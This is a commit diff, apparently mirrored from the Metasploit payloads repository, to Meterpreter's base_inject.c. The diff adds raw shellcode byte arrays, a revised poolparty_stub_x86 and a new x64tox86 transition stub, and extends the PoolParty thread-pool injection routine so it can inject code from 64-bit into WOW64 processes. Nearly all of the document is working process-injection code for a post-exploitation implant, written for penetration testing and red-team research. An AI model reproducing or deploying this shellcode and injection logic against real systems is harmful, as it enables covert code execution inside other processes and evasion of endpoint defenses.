github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-26 17:41:08 +01:00
Code Releases Activity

feat: attempt to have x64->wow64 injection with tp_direct_insertion

Browse Source
This commit is contained in:
dledda-r7 2024-08-30 05:21:42 -04:00
parent ebe086f5ea
commit a97444d79c
No known key found for this signature in database
GPG Key ID: 4D4EC504A1F02FFF
1 changed files with 53 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

74
c/meterpreter/source/metsrv/base_inject.c
View File

@ -78,19 +78,20 @@ BYTE apc_stub_x64[] = "\xFC\x80\x79\x10\x00\x0F\x85\x13\x01\x00\x00\xC6\x41\x10
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00";
BYTE poolparty_stub_x86[] = "\xFC\xE9\xBE\x00\x00\x00\x5E\x55\x89\xE5\xE8\x8C\x00\x00\x00\x60"
"\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72"
"\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20"
"\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x57\x8B\x52\x10\x8B\x42\x3C"
"\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4C\x01\xD0\x50\x8B\x48\x18\x8B"
"\x58\x20\x01\xD3\x85\xC9\x74\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF"
"\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B"
"\x7D\x24\x75\xE0\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58"
"\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59"
"\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x83\x5B\xFF\x76\x10\x6A"
"\xFF\x68\x08\x87\x1D\x60\xFF\xD3\x31\xC9\x51\x51\xFF\x76\x08\xFF"
"\x36\x51\x51\x68\x38\x68\x0D\x16\xFF\xD3\x31\xC0\x39\xC0\x74\xFA"
"\xC9\xC2\x0C\x00\xE8\x3D\xFF\xFF\xFF";
BYTE poolparty_stub_x86[] = "\xFC\xE9\xD2\x00\x00\x00\x5E\x55\x89\xE5\xE8\xA0\x00\x00\x00\x60"
"\x89\xE5\x31\xD2\x8C\xEA\x85\xD2\x75\x06\x64\x8B\x52\x30\xEB\x0C"
"\x31\xD2\x65\x8B\x52\x60\x81\xC2\x00\x10\x00\x00\x8B\x52\x0C\x8B"
"\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x57\x8B\x52"
"\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4C\x01\xD0\x50"
"\x8B\x48\x18\x8B\x58\x20\x01\xD3\x85\xC9\x74\x3C\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4"
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE0\x58\x8B\x58\x24\x01\xD3\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24"
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x83\x5B"
"\xFF\x76\x10\x6A\xFF\x68\x08\x87\x1D\x60\xFF\xD3\x31\xC9\x51\x51"
"\xFF\x76\x08\xFF\x36\x51\x51\x68\x38\x68\x0D\x16\xFF\xD3\x31\xC0"
"\x39\xC0\x74\xFA\xC9\xC2\x0C\x00\xE8\x29\xFF\xFF\xFF";
BYTE poolparty_stub_x64[] = "\xFC\xE9\x09\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC8\x00\x00\x00"
"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48"
@ -110,6 +111,26 @@ BYTE poolparty_stub_x64[] = "\xFC\xE9\x09\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC
"\x8B\x01\x4C\x8B\x49\x08\x48\x31\xC9\xBA\x00\x00\x10\x00\x51\x51"
"\x41\xBA\x38\x68\x0D\x16\xFF\xD5\x31\xC0\x39\xC0\x74\xFA\x90\xE8"
"\xF2\xFE\xFF\xFF";
BYTE x64tox86[] = "\xFC\xE9\x14\x01\x00\x00\x5E\x48\x83\xEC\x78\xE8\xC8\x00\x00\x00"
"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48"
"\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A"
"\x4D\x31\xC9\x48\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9"
"\x0D\x41\x01\xC1\xE2\xED\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C"
"\x48\x01\xD0\x66\x81\x78\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00"
"\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40"
"\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6"
"\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0"
"\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40"
"\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0"
"\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58"
"\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A"
"\x48\x8B\x12\xE9\x4F\xFF\xFF\xFF\x5D\x41\xBA\x75\x3F\x47\x32\xFF"
"\xD5\x48\xC7\xC0\xFE\xFF\xFF\xFF\x48\x89\xC1\x48\x89\xF2\x4D\x31"
"\xC0\x4D\x31\xC9\x41\x51\x41\xBA\x13\xBF\xB3\xB9\xFF\xD5\x48\x31"
"\xC9\x48\x31\xD2\x4D\x31\xC0\x4D\x31\xC9\x41\xBA\x6D\xA2\xAF\xF3"
"\xFF\xD5\x48\x31\xC0\x48\x85\xC0\x74\xF8\xE8\xE7\xFE\xFF\xFF\xC3";
/*
* Attempt to gain code execution in the remote process via a call to ntdll!NtQueueApcThread
* Note: Windows Server 2008R2 can blue screen if you use APC injection to inject into another sessions csrss.exe
@ -520,7 +541,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
DWORD dwResult = ERROR_SUCCESS;
DWORD dwTechnique = MIGRATE_TECHNIQUE_REMOTETHREAD;
HANDLE hThread = NULL;
LPVOID lpPoolPartyStub = NULL;
LPVOID lpPoolPartyStub;
POOLPARTYCONTEXT ctx = { 0 };
ctx.s.lpStartAddress = lpStartAddress;
ctx.p.lpParameter = lpParameter;
@ -531,18 +552,28 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
DWORD dwStubSize = 0;
DWORD dwPoolPartyVariant = POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION;
HANDLE hHeap = GetProcessHeap();
do
{
if (dwDestinationArch == dwMeterpreterArch) {
if (dwMeterpreterArch == PROCESS_ARCH_X64) {
if (TRUE) {
if (dwDestinationArch == PROCESS_ARCH_X64) {
dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_x64");
lpStub = &poolparty_stub_x64;
dwStubSize = sizeof(poolparty_stub_x64) - 1;
}
else {
}else if (dwMeterpreterArch == PROCESS_ARCH_X86 && !IsWow64Process(GetCurrentProcess(), NULL)) {
dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_x86");
lpStub = &poolparty_stub_x86;
dwStubSize = sizeof(poolparty_stub_x86) - 1;
}
else {
dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_wow64");
lpStub = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2);
memcpy(lpStub, x64tox86, sizeof(x64tox86) - 1);
memcpy((LPBYTE)lpStub + sizeof(x64tox86) - 1, poolparty_stub_x86, sizeof(poolparty_stub_x86));
dwStubSize = sizeof(x64tox86) + sizeof(poolparty_stub_x86) - 2;
}
hTriggerEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
if (!hTriggerEvent)
@ -557,7 +588,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
}
lpPoolPartyStub = VirtualAllocEx(hProcess, NULL, dwStubSize + sizeof(POOLPARTYCONTEXT), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//dprintf("[INJECT][inject_via_poolparty] ctx [%p] lpStartAddress: %p lpParameter %p hTriggerEvent %p", (LPBYTE) lpPoolPartyStub + dwStubSize, ctx.s.lpStartAddress, ctx.p.lpParameter, ctx.e.hTriggerEvent);
dprintf("[INJECT][inject_via_poolparty] ctx [%p] lpStartAddress: %p lpParameter %p hTriggerEvent %p", (LPBYTE) lpPoolPartyStub + dwStubSize, ctx.s.lpStartAddress, ctx.p.lpParameter, ctx.e.hTriggerEvent);
if (!lpPoolPartyStub) {
BREAK_WITH_ERROR("[INJECT] inject_via_poolparty: VirtualAllocEx failed!", ERROR_POOLPARTY_GENERIC);
}
@ -570,7 +601,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
BREAK_WITH_ERROR("[INJECT] inject_via_poolparty: Cannot write custom shellcode!", ERROR_POOLPARTY_GENERIC);
}
if (remote_tp_direct_insertion(hProcess, lpPoolPartyStub, (BYTE*)lpPoolPartyStub + dwStubSize, &hTriggerEvent) == ERROR_SUCCESS) {
if (remote_tp_direct_insertion(hProcess, dwDestinationArch, lpPoolPartyStub, (BYTE*)lpPoolPartyStub + dwStubSize, &hTriggerEvent) == ERROR_SUCCESS) {
dprintf("[INJECT] inject_via_poolparty: injectied!");
}
else {
@ -787,6 +818,7 @@ DWORD inject_dll_stealth (DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuff
return dwResult;
}
DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD dwDllLength, LPCSTR reflectiveLoader, LPVOID lpArg, SIZE_T stArgSize) {
DWORD injected = 1;
if (support_stealth_injection(dwDestinationArch)) {
@ -796,4 +828,4 @@ DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD
injected = inject_dll_legacy(dwPid, dwDestinationArch, lpDllBuffer, dwDllLength, reflectiveLoader, lpArg, stArgSize);
}
return injected;
}
}